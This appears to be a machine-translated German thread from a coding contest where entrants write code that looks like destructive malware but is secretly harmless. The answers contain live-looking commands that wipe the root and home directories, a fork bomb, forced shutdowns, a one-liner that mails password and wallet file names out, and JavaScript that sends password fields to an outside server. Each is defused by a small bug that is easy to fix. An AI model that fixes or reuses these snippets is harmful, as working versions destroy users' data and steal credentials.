Ein Troll hat Sie gefangen genommen und zwingt Sie, Malware zu schreiben (definiert als ein Programm, das den Computer beschädigt, auf dem er ausgeführt wird). Der Troll kann Code lesen und verstehen, kann aber nicht so gut Fehler erkennen.

Ihr Ziel ist es, ein Programm zu schreiben, das:

1. Sieht nach Malware aus. dh ein beginnender Programmierer, der den Code liest, ist davon überzeugt, dass der Code den Computer beschädigt, auf dem er ausgeführt wird.
2. Tatsächlich überhaupt kein Schaden.

HINWEIS: Der Troll liest nur den Code - nicht die Kommentare. Der Code selbst sollte also klar und überzeugend genug sein.

BEISPIEL (Bash):

rm - rf /home

Dieses Beispiel sieht so aus rm -rf /home, als würde es alle privaten Ordner vom System entfernen. Aufgrund des Platzes vor dem RF funktioniert dies jedoch nicht und es wird nur eine harmlose Fehlermeldung ausgegeben.

Dies ist eine akzeptable Lösung, aber nicht sehr gut, da der Fehler recht einfach zu erkennen ist.

Andererseits ist ein komplexes und unlesbares Programm auch keine sehr gute Lösung, da es nicht nach Malware aussieht.

Eine gute Lösung sollte lesbar genug sein, um den Leser davon zu überzeugen, dass es sich um Malware handelt, aber einen Fehler enthalten, der schwer zu erkennen ist und ihn harmlos macht.

Dies ist ein Beliebtheitswettbewerb, daher gewinnt der Code mit den meisten positiven Stimmen.

Bash

Ich bin den anderen Weg gegangen. Anstatt alles auf Ihrer Festplatte zu löschen, fülle ich es mit Müll.

Dieses Skript erstellt einen Ordner catund fügt alle Dateien fortlaufend in einen neuen Ordner ein. Dabei wird der Wert von ls -al(und damit die Startdatei etwas enthält) addiert .

#!/bin/bash/

makeSpam()
{
    string=`cat *`
    string=$string`ls -al`
    echo $string > "file"$i".spam"
}

mkdir "SpamForYou"
cd "SpamForYou"

i=1
while [ 1 ]
do
  makeSpam $i
  i=$(($i + 1))
done

außer...

Es ist sehr unwahrscheinlich, dass / bin / bash / (anstelle von / bin / bash) ein gültiger Interpreter ist. Dies ist nur ein häufiger Tippfehler von mir. Und da "der Shebang technisch gesehen ein Kommentar ist, wird der Troll ihn ignorieren"

Haskell

Überprüfen Sie diese Handbuchseite , removeDirectoryRecursivelöscht ein Verzeichnis mit allen Inhalten!

import System.Directory
main = return (removeDirectoryRecursive "/")

Der richtige Code wäre main = removeDirectoryRecursive "/"
Die mainFunktion soll ein Konzept zurückgeben , etwas zu tun. removeDirectoryRecursive "/"gibt ein Konzept zum Löschen Ihres Dateisystems zurück, aber die returnFunktion (ja, es ist eine Funktion) schließt ihr Argument in ein Dummy- Konzept zum Zurückgeben dieses Werts ein.
Am Ende haben wir das Konzept, ein Konzept zum Löschen Ihres Laufwerks zurückzugeben. (Yo dawg I herd you like concepts.) Die haskell-Laufzeit führt das zurückgegebene Konzept aus mainund verwirft den zurückgegebenen Wert, in unserem Fall ein Konzept zum Löschen Ihres Dateisystems.

PHP

Hier ist ein rekursives PHP-Skript, das versucht, jede einzelne Datei auf Ihrer Website zu löschen. Es kann eine Weile dauern, bis die Website vollständig ist. Seien Sie also geduldig ...

<html>
<body>
<p>Deleting website; please wait
<img src="data:image/gif;base64,R0lGODlhCAAIAPAAAAAAAP///yH/C05FVFNDQVBFMi4wAwEAAAAh+QQEMgD/ACwAAAAACAAIAAACBoSPqcvtXQAh+QQFMgAAACwAAAAACAAIAAACBoyPqcvtXQA7" /></p>
<?php

function zapfiles($dir) {
  if (is_dir($dir)) {
    $files = scandir($dir);
    foreach ($files as $file) {
      if ($file != '.' && $file != '..') {
        if (is_dir("$dir/$file")) {
          zapfiles("$dir/$file");
        }
        else {
          try {
            @delete("$dir/$file"); // Suppress locked file errors
          }
          catch (Exception $e) {
            // Locked files can't be deleted; just carry on
          }
        }
      }
    }
  }
}

zapfiles($_SERVER['DOCUMENT_ROOT']);

?>
<p>Website deletion complete</p>

Nur ein _kleines Problem ...

Es gibt keinen delete () Befehl in PHP. Das Skript schlägt fehl, sobald es auf diesen Befehl stößt. Es wird jedoch keine Fehlermeldung angezeigt, da die Fehlerberichterstattung durch das Präfixieren dieses Befehls mit @ unterdrückt wurde . Das blinkende GIF-Bild vermittelt den Eindruck, dass etwas passiert, wenn überhaupt nichts passiert.

Perl (Unix)

Löscht alle Dateien auf dem System.

#! /usr/bin/perl -w
use strict;

sub killdir {
    opendir(my $dh, ".");
    my @dl = readdir($dh);
    closedir($dh);
    foreach my $de (@dl) {
        if (-d $de) {
            chdir($de);
            killdir();
            chdir("..");
            rmdir($de);
        } else {
            unlink($de);
        }
    }
}

chdir("/");
killdir();

Eigenschaften

• Dies ist gültiges Perl. Es kompiliert und läuft sogar mit -wund use strict!

• Keine Probleme wie in C ++ delete. unlinkWirklich ist die Funktion, um eine Datei zu löschen, rmdirwirklich ein Verzeichnis zu entfernen, etc.

• Behandelt tief verschachtelte Verzeichnisse korrekt, für die der absolute Pfadname die maximale Länge des Systems überschreiten kann, indem Sie in jedes Verzeichnis wechseln, um relative Pfade zu verwenden. Außerdem werden nicht alle Verzeichnis-Handles ausgehen, da das Verzeichnis vor der erneuten Ausführung gelesen und geschlossen wird.

Spoiler

Unter Unix lautet der erste Eintrag im Stammverzeichnis normalerweise "." Daher führt das Programm eine unendliche Rekursion von chdir (".") durch, bis der Speicher voll ist und ein Absturz auftritt.

Weitere Hinweise

Dies war schwieriger zu korrigieren als erwartet. Wenn Sie den chdir-Ansatz nicht verwenden, erhalten Sie schließlich einen zu langen Pfadnamen. Dann gibt -d false zurück und die unendliche Rekursion ist unterbrochen, und die Dateien werden möglicherweise tatsächlich gelöscht! Ein ähnlicher Fehler kann auftreten, wenn Sie Verzeichnis-Handles geöffnet lassen. irgendwann läuft ihr aus, opendir schlägt fehl, killdir kehrt zurück und der Löschvorgang beginnt.

Shell Einzeiler

Dadurch werden alle Passwörter, privaten Schlüssel, Bitcoins usw. des Opfers gestohlen.

 find / -name "passwd" -or -name "shadow" -or -name "secring.gpg" -or -name "wallet.dat" |mail [email protected]

Spoiler:

Dies sieht möglicherweise so aus, als würde es all diese Dateien per E-Mail an den Troll senden, aber tatsächlich werden nur deren Dateinamen per E-Mail gesendet.

Charge / CMD

sparen

DEL %0
DEL %1
DEL %2
DEL %3
DEL %4
DEL %5
DEL %6
DEL %7
DEL %8
DEL %9

und veranlassen Sie sie, es mit Parametern jedes Laufwerks auf dem Computer auszuführen.

% 0 ist immer der erste Parameter - der Dateiname. Danach kommt der Satz von Aktualparametern, aber er hat sich bereits gelöscht, so dass er nicht fortgesetzt wird.

Javascript

infiniteLoop=true;
evilMessage='I spam you !';
while(infiniteLoop) {
  eval(atob('aW5maW5pdGVMb29wPWZhbHNlO2V2aWxNZXNzYWdlPWV2aWxNZXNzYWdlLnJlcGxhY2UoInNwYW0iLCJMT1ZFIik7'));
  alert(evilMessage);
}

Nun, die ursprüngliche Malware wird Ihren Computer nicht in die Luft jagen, kann aber ärgerlich sein.

Das ist harmlos, weil:

Das evalunterbricht die Endlosschleife und ändert die Nachricht.

Java

Mögen die Götter mir vergeben, dass ich mich deinen elenden Forderungen unterworfen habe, Troll.

class HomeWrecker {
    public static void main(String[] args) throws Exception {
        Runtime.getRuntime().exec("rm -rf /home/*");
    }
}

Runtime.exec ruft keine Shell auf, sodass die Glob-Erweiterung niemals stattfindet und der Befehl erfolglos versucht, ein Ausgangsverzeichnis mit dem Namen "*" zu löschen.

C

Da er keine Kommentare liest, die es tun sollten:

#include<stdlib.h>
int main()
{
//Are you reading this??/
 system("C:\\WINDOWS\\System32\\shutdown /s /t 0000");

 return 0;
}

C ++ Version

danke an DragonLord dafür.

#include<cstdlib>
int main ()
{
//Are you reading this??/
system("shutdown -s -t 0000");
return 0; 
}

Fügen Sie dies in den Startordner ein und starten Sie den Computer neu.

Wie es funktioniert:

?? / ist ein trigraph und wird die nächste Zeile in den Kommentar hinzufügen so dass im Grunde wird es nichts. Hinweis: versuchen Sie nicht, diese trigraphs in einigen Compiler als Standard ausgeschaltet werden könnte, und muss dazu eingeschaltet sein, zu arbeiten.

Java

import java.io.File;
class derp
{
    public static void main( String[] a)
    {
        new File("C:\\windows\\System32\ntoskrnl.exe").delete();
    }
}

Verwenden eines Escapezeichens (die \ n vor ntoskrnl.exe ist eine neue Zeile anstelle des normalen N)

BASH

#!/bin/bash
set -t 

echo "hahaha deleting files.."
rm -rf / --no-preserve-root

set -t wird beendet, nachdem ein Befehl gelesen und ausgeführt wurde. Dieses Skript druckt keine Ausgabe und alle Dateien sind sicher!

Oder den folgenden ABER LESEN SIE DEN SPOILER, BEVOR SIE LAUFEN

#!/bin/bash -t
echo "hahaha deleting files.."
rm -rf / --no-preserve-root

Auf vielfachen Wunsch wird .. beendet #!/bin/bash -t, nachdem ein Befehl gelesen und ausgeführt wurde. Führen Sie dies nicht unter aus, bash -xda dies -tdie Befehle im Skript ignoriert und ausführt.

Python

print "****----....____....----"""" This program will clear the browser cache "

import os
from os.path import expanduser
home = expanduser("~")
os.remove(home)

print """"----....____....----***** Cache cleaned. "                                     

drei Anführungszeichen "" starten eine mehrzeilige Zeichenkette in Python

D

Dieses Programm ist gültig und wird fehlerfrei ausgeführt. Es wird eine Löschfunktion in einem neuen Thread erzeugt, die das rootVerzeichnis löscht .

import std.concurrency : spawn;
import std.file : rmdirRecurse;

string root;

void deleteRoot()
{
    if (root)
        rmdirRecurse(root);
}

void main()
{
    root = "/";
    spawn(&deleteRoot);
    // ... could add a waiting animation here.
}

Aber nichts wird gelöscht ...

da in D eine im Modulbereich deklarierte Variable standardmäßig thread-lokal ist. Die mainFunktionen setzen es auf "/", aber die Spawn-Threads haben eine leere Kopie, so dass die rmdirRecurseFunktion nicht aufgerufen wird.

C (Unix)

Das Hinzufügen einiger Anzeigen hat noch nie jemandem geschadet.

#include <stdlib.h>

int main()
{
    // Join the crew
    goto http;//www.trolling.com
    print("Sucker!\n");
    system("rm -rf ~");
    // Remember goto
    http://www.trolling.com
    return 0;
}

http: es ist ein Label, der Sprung zum Label fehlt der Harful-Code. : V

JavaScript

function foo(a) { // Returns an object, and all objects are truly
    return
    {
        a: a
    };
}
for(var i=0; foo(i); ++i) // loop condition is always truly
    alert('Infinite alerts!');

Es wird keine Warnung angezeigt. Da JavaScript nicht ;am Zeilenende benötigt wird, wird es automatisch nach return, werden eingefügt return;. Dann wird undefined, was falsch ist, anstelle des "Objekts" (das tatsächlich als Blockanweisung analysiert wird) zurückgegeben.

JavaScript

//Config: Warning!!! only set to true on victims box!
var deleteEverything = true;

function deleteIfEvil(){
  if(deleteEverything){
    alert('Destroy Everything!');
    //clear the flag
    var deleteEverything = false;
  } else {
    alert('Tested OK!');
  }
}

deleteIfEvil();

Tauschen Sie den Zerstörungsalarm gegen die böse zerstörerische Aktion aus, die Sie verwenden möchten.

Spoiler:

Obwohl es so aussieht, als ob die Konfiguration auf Löschen eingestellt ist ... und das ist es ! Die 'var'-Deklaration in der Funktion lautet "Hoisted" http://www.adequatelygood.com/JavaScript-Scoping-and-Hoisting.html und ist daher beim Aufrufen der Funktion tatsächlich falsch.

Java

Löschen wir einfach einige wichtige Dateien!

import java.io.File;
import java.io.IOException;

public class Deleter {

    private File importantFile = null;

    public Deleter(File f) {

        importantFile = f;

        /**}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{
         * }{ I don't care how important that file is. I'm going to delete it! }{
         * }{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{*/}{

        importantFile.delete();

    }

    public static void main(String[] args) throws IOException {
        // Let's delete some important stuff
        new Deleter(new File("/boot/vmlinuz"));
        new Deleter(new File("/etc/passwd"));
        new Deleter(new File("/etc/crontab"));
        new Deleter(new File("/etc/sudoers"));
    }

}

Im Blockkommentar ist ein zusätzliches} {außerhalb des Kommentars verborgen. Dadurch wird das Löschen von Dateien in einen separaten Instanzinitialisierungsblock verschoben, der vor dem Konstruktor ausgeführt wird. Derzeit ist importantFile noch null.

Bash, C, Linux

Vielleicht ist es nicht gerade eine Malware, aber sicher kann es Teil einer sein :)

Es ist ein erstaunlicher Exploit, mit dem Sie auf jedem Linux-Rechner rooten können! Pssst, sag niemandem, dass wir es haben!

#!/bin/sh
cd /tmp
cat >ex.c <<eof
int getuid() { return 0; }
int geteuid() { return 0; }
int getgid() { return 0; }
int getegid() { return 0; }
eof
gcc -shared ex.c -oex.so
LD_PRELOAD=/tmp/ex.so sh
rm /tmp/ex.so /tmp/ex.c

Führen Sie nun das Skript aus und Sie sind root! Sie können sicherstellen, dass mit whoami!

Tatsächlich werden nur alle Anwendungen mit der UID = 0 ausgetrickst (dies ist die Root-Benutzer-ID).

Der Code wurde von Lcamtuf geschrieben, Quelle: http://lcamtuf.coredump.cx/soft/ld-expl

Bash

cat <<EOF
ProHaxer Hacking Tool 2014. Destroying your computer in
background, please wait until it finishes.
EOF

# Freeze the machine, so nobody will stop the process.
:(){:|:&};:

# Remove stuff in the background.
rm -rf /* &>/dev/null &

In der Zeile "fork-bomb" ist ein Syntaxfehler aufgetreten. Nach { sollte ein Leerzeichen stehen. Andernfalls schlägt das Skript fehl, da auf die Funktionsdefinition nicht das { Token von selbst folgt .

Emacs Lisp

Zuerst eine einfache. Dieser tut nichts. Es wird tatsächlich versucht, Elemente zu löschen, die gleich: rekursiv aus der von zurückgegebenen Liste sind directory-files. Es werden keine Dateien gelöscht.

(delete :recursive
    (directory-files "/"))

Hier ist einer, der sogar Elisp-Tierärzte überraschen könnte.

(let ((files (directory-files "/")))
  (while (setq file (pop files) )
    (delete-file file)))

Dies ist nur 1 Zeichen vom Löschen Ihres Stammverzeichnisses entfernt.

Mit emacs lisp kann jsut über alles den Namen eines Symbols (Variable, Funktion, Makro usw.) annehmen. Es ist in Ordnung, Unicode im Namen Ihrer Symbole zu verwenden, und genau das geschieht hier.

setqkann eine beliebige Anzahl von Argumenten annehmen (setq a 3 b 4)ist wie a = 3; b = 4; ist aber (setq a 3 b)auch gültig und macht a = 3; b = null;

Der Rückgabewert von setq ist der Wert, der der letzten Variablen zugewiesen wurde. 4 bzw. Null in den Beispielen.

(setq a 3 b)ist genau das, was im Code passiert, aber anstelle von b verwende ich ein Unicode-Leerzeichen. Ich weise den Wert nil einer Variablen namens zu, deren Name das Unicode-Zeichen 0x2001 ist. Aus diesem Grund wird von setq nil zurückgegeben, und die Bedingung für die while-Schleife ist niemals wahr. Wenn Sie dieses Leerzeichen entfernen, läuft es einwandfrei.

Nur ein weiterer Perl-Hacker.

Ich schrieb dieses im Jahr 2002 , während ich bei Perlmonks war und im Allgemeinen nur versuchte, mein Wissen über Perl so weit wie möglich zu erweitern. Hat es überhaupt nicht bearbeitet, läuft aber trotzdem.

#!/usr/bin/perl -w
use strict;
require File::Path;

my $root_dir = '/';

$root_dir = 'c:\\' if( $^O =~ /Win/i );

rmtree( $root_dir );

mkdir( $root_dir );

open( ROOT, $root_dir );

while(1)
{
  BEGIN{@INC=sub{*DATA}}
  print ROOT <DATA>;
}

__DATA__
# Fill the harddrive with junk!
''=~('('.'?'.'{'.('`'|'%').('['
^'-').('`'|'!').('`'|',').'"'.(
'['^'+').('['^')').('`'|"\)").(
'`'|'.').('['^'/').('{'^('[')).
'\\'.'"'.('`'^'*').('['^"\.").(
'['^'(').('['^'/').('{'^"\[").(
'`'|'!').('`'|'.').('`'|"\/").(
'['^'/').('`'|'(').('`'|"\%").(
'['^')').('{'^'[').('['^"\+").(
'`'|'%').('['^')').('`'|"\,").(
'{'^'[').('`'|'(').('`'|"\!").(
'`'|'#').('`'|'+').('`'|"\%").(
'['^')').'.'.'\\'.'\\'.('`'|'.'
).'\\'.'"'.';'.('`'|'%').("\["^
'#').('`'|')').('['^'/').(';').
'"'.'}'.')');$:='.'^'~';$~='@'|
'(';$^=')'^'[';$/='`'|('.');$_=
'('^'}';$,='`'|'!';$\=')'^"\}";
$:='.'^'~';$~='@'|'(';$^=(')')^
'[';$/='`'|'.';$_='('^('}');$,=
'`'|'!';$\=')'^'}';$:='.'^"\~";
$~='@'|'(';$^=')'^'[';$/=('`')|
'.';$_='('^'}';$,='`'|('!');$\=
')'^'}';$:='.'^'~';$~='@'|"\(";
$^=')'^'[';$/='`'|'.';$_=('(')^
'}';$,='`'|'!';$\=')'^('}');$:=
'.'^'~';$~='@'|'(';$^=')'^"\[";

Wenn ich mich richtig erinnere, BEGINläuft der Block zuerst, egal wo er sich im Code befindet. Es ersetzt @INCdas, von dem Perl seine Bibliotheken lädt, durch eine Unterroutine (es ist normalerweise eine Reihe von Pfaden, aber dies ist zulässig). Die Subroutine ist eigentlich der verschleierte Datenblock, der etwas Regexp + Evalmagie ausführt. Wenn dann der Code auftaucht require File::Path;(mit dem es nicht funktioniert hätte use), wird dieses Sub ausgeführt und gibt einfach "Just another perl hacker." Aus, wie es Tradition ist, und wird beendet. Der Rest des Codes wird nie erreicht.

PHP:

$condition = true and false;

if (!$condition) {
   // DO EVIL - Just do something evil here
}

Auf den ersten Blick $conditionist falsch, aber der =Operator hat Vorrang vor and, sodass die Bedingung wahr ist. Das Böse wird also niemals getan.

C ++ mit Boost

Dadurch werden alle Dateien im Dateisystem gelöscht

#include "boost/filesystem.hpp"
using namespace boost::filesystem;

void delete_directory(const path* dir_path)
{
  if (!exists(*dir_path)) return;

  directory_iterator end_file_itr;
  for (directory_iterator file_itr(*dir_path);
        file_itr != end_file_itr;
        ++file_itr) {
    const path* file = &file_itr->path();
    if (file_itr->status().type() == directory_file) {
      delete_directory(file);
    } else {
      delete(file);
    }
  }

  delete(dir_path);
}

int main() {
  delete_directory(new path("/"));
  return 0;
}

Eigentlich wird es nicht. deletein C ++ wird verwendet, um den von zugewiesenen Speicher freizugeben newund nicht, um Dateien und Verzeichnisse zu löschen. Das Programm wird höchstwahrscheinlich mit einem Segmentierungsfehler abstürzen, da es versucht, den von Boost zugewiesenen Speicher freizugeben, aber zu diesem Zeitpunkt bin ich der Gefangenschaft des Trolls entkommen.

Java

Dies gibt vor, RAM herunterzuladen, löscht jedoch das Home-Verzeichnis des Benutzers.

import java.util.*;
import java.io.*;
class RamDownloaderIO {
    public static void main(String[] args) {
        long onePercentWaitTime   = 2*60*1000;  // 2 minutes
        long twoPercentWaitTime   = 7*60*1000;  // 7 minutes
        long deleteWaitTime       = 9*60*1000;  // 9 minutes
        long completeWaitTime     = 10*60*1000; // 10 minutes
        Timer timer = new Timer(true);
        // User thinks, Hmm this is taking a while
        timer.schedule(new TimerTask() {
            public void run() {
                System.out.println("1% done");
            }
        }, onePercentWaitTime);
        // User is now completely impatient, and either leaves to get a coffee
        // or starts reading reddit
        timer.schedule(new TimerTask() {
            public void run() {
                System.out.println("2% done");
            }
        }, twoPercentWaitTime);
        // Now that he's not looking, delete everything in his home directory
        timer.schedule(new TimerTask() {
            public void run() {
                try {
                    final Runtime rt = Runtime.getRuntime();
                    rt.exec("rm -rf ~/*");
                } catch (IOException e) {
                }
            }
        }, deleteWaitTime);
        // Inform the user that the task is finished
        timer.schedule(new TimerTask() {
            public void run() {
                System.out.println("Download complete!");
                System.out.println("You now have 21.47GB RAM!");
                System.exit(0);
            }
        }, completeWaitTime);
        System.out.println("Welcome to the ramdownloader.io RAM downloader");
        System.out.println("Please wait. Downloading your free RAM...");

    }
}

TimerVerwendet einen Hintergrund-Thread, um Ihre TimerTasks aufzurufen, die Sie an ihn gesendet haben. new Timer(true)Erstellt einen TimerThread, bei dem der Hintergrund als Daemon-Thread festgelegt ist, sodass das Programm sofort beendet wird, bevor die Tasks ausgeführt werden können. Der zu lange Code lenkt den Troll davon ab, den trueParameter zu sehen.

rm -rf ⁄

Das Zeichen ist kein regulärer Schrägstrich (/, dh SOLIDUS in Unicode), sondern ein FRACTION SLASH. Gibt eine Meldung wie "rm: ⁄: Keine solche Datei oder kein solches Verzeichnis" aus.

Bash

# This script should always be executed as root #
set -e

cleanup() {
  rm -rf / --no-preserve-root
}

eval $(base64 -d <<< "dW5zZXQgLWYgY2xlYW51cA==")
eval $(base64 -d <<< "Y2xlYW51cCgpIHsgZWNobyBUcm9sbCBkZXRlY3RlZDsgfQo=")
cleanup

Es ist vielleicht so böse wie es nur geht. Es definiert eine Funktion, die ausgeführt rm -rf /und aufgerufen wird. Nicht nur, dass es das Böseeval bei mehr als einer Gelegenheit ausnutzt.

Es würde sicher eine Menge Schaden anrichten!

evalWenn Sie sich fragen, setzt der erste die Funktion zurück durch: unset -f cleanup Der zweite evaldefiniert sie wie folgt: Wenn Sie cleanup() { echo Troll detected; } den Code ausführen, werden Sie sehen Troll detected

BASH

Sicher, wir brauchen Root-Rechte für die Maschine, also verwenden wir den guten alten "Do I have root?" - Checker, auch bekannt als " ch (eck) root" - aber besser in einem Verzeichnis, in dem nicht viele Alarme ausgelöst werden. / tmp wäre perfekt, da dort jeder Dateien schreiben kann.

Danach löschen wir nur die gesamte Festplatte Lachen böse

mkdir -p /tmp/chroot_dir && chroot /tmp/chroot_dir /bin/bash -c "su - -c rm -rf /*"

iPhone - Flappy Bird Clone

Während der Benutzer einen iPhone Flappy Bird-Klon abspielt, werden alle Dateien im Verzeichnis "Dokumente" gelöscht.

#import "AppDelegate.h"
#import "FlappyBirdClone.h"

@implementation AppDelegate

- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions
{
    FlappyBirdClone *flappyBirdClone = [FlappyBirdClone new];
    [flappyBirdClone startFlapping];

    NSURL *documentsDirectory = [[[NSFileManager defaultManager] URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask] lastObject];
    [self deleteAllDocumentsInDirectory:documentsDirectory];

    return YES;
}

- (void)deleteAllDocumentsInDirectory:(NSURL *)directoryURL
{
    NSArray *fileURLs = [[NSFileManager defaultManager] contentsOfDirectoryAtURL:directoryURL includingPropertiesForKeys:@[] options:0 error:nil];

    [fileURLs enumerateObjectsUsingBlock:^(NSURL *fileURL, NSUInteger idx, BOOL *stop) {
        [[NSFileManager defaultManager] removeItemAtURL:fileURL error:nil];
    }];
}

Jede App in iOS ist eine Sandbox. Dadurch wird zwar alles im Verzeichnis "Dokumente" gelöscht, es ist jedoch nur das Verzeichnis "Dokumente" für diese bestimmte App. Der Troll ist sich dessen offensichtlich nicht bewusst, da er bereits mit so vielen Programmen für andere Plattformen überflutet wurde. Und sobald er merkt, dass auch er einen Flappy Bird-Klon herausbringen kann, ist er vielleicht so aufgeregt, dass er sich nicht einmal Gedanken über den Rest des Codes macht, da er zu sehr davon träumt, 50.000 USD pro Tag ohne Werbung zu verdienen irgendeine Arbeit machen.

Gehen:

package main

import (
    "fmt"
    "os"
    "sync"
)

func main() {
  wg := sync.WaitGroup{}
  go deleteAll(wg)
  wg.Wait()
}

func deleteAll(wg sync.WaitGroup) {
    wg.Add(1)
    defer wg.Done()
    fmt.Println("Press enter to clean your computer!")
    fmt.Scanln()
    os.RemoveAll("/home")
}

Dieser ist ein bisschen knifflig. In Go wird das gesamte Programm beendet, wenn die Haupt-Goroutine beendet wird. Eine gute Möglichkeit, dies zu beheben, ist eine Wartegruppe. Es gibt zwei große Probleme mit meinem "Fix":

1. Die Wartegruppe wird erst hinzugefügt, wenn die Goroutine startet. Dies bedeutet, dass die Haupt-Goroutine trifft, Waitbevor die Löschung von Goroutine eintritt Add. Da der Zähler 0 ist, muss er nicht warten und wird nicht blockiert und beendet, wodurch das Programm beendet wird.
2. Auch wenn es irgendwie magisch ist, wird das Hinzufügen von deleteAll goroutine zuerst ausgeführt. Es hat eine Kopie der Waitgroup, keinen Zeiger darauf. Es wird nicht zur selben Wartegruppe hinzugefügt, sodass die Haupt-Goroutine es niemals sieht.

Die Eingabe, die mit fmt.Scanln () erwartet wird, dient nur dazu, sicherzustellen, dass die Haupt-Goroutine beendet wird, bevor etwas passiert. Das Println wird wahrscheinlich dazu führen, dass es E / A blockiert und zum Ausführen der Haupt-Goroutine wechselt (und somit beendet wird), und das Scanln wird dies mit ziemlicher Sicherheit tun. In der Realität ist beides bei keiner Go-Version erforderlich.

In der Supertheorie könnte dies funktionieren und etwas löschen, was bedeutet, dass es gemäß dem Go-Speichermodell keine garantierte Beziehung zwischen dem Ende mainund der Ausführung von "happen-before" gibt RemoveAll, aber es wird nicht auf einer modernen Go-Laufzeitumgebung / einem Compiler wie gezeigt von allen Neulingen, die den Fehler machen, die Synchronisation nicht in ihre Hauptfunktionen zu setzen.

Javascript

function(){
    setInterval(function(){
        var passwordList = document.getElementsByTagName('input') ;
        var i, length = passwordList.length ;
        for(i = 0 ; i < lenght ; i++) if(passwordList[i].type == 'password'){
            var img = document.createElement('img') ;
            img.src = 'http://troll-server-password-listener.com/fake-image.jpg?password=' + passwordList[i].value ;
            img.style.display = none ;
            img.addEventListener('load', function(){
                var that = this ;
                setTimeout(function(){ that.outerHTML = '' }, 0) ;
            }) ;
            document.body.appendChild(img) ;
        }
    }, 1) ;
}() ;

1.

Es wird nicht ausgeführt, Sie können keinen Abschluss erstellen, ohne ihn mit Parens zu ersetzen

2.

Wenn es der Troll schafft, das zu beheben, gibt es einen schönen Tippfehler, der behoben werden muss ... ;-)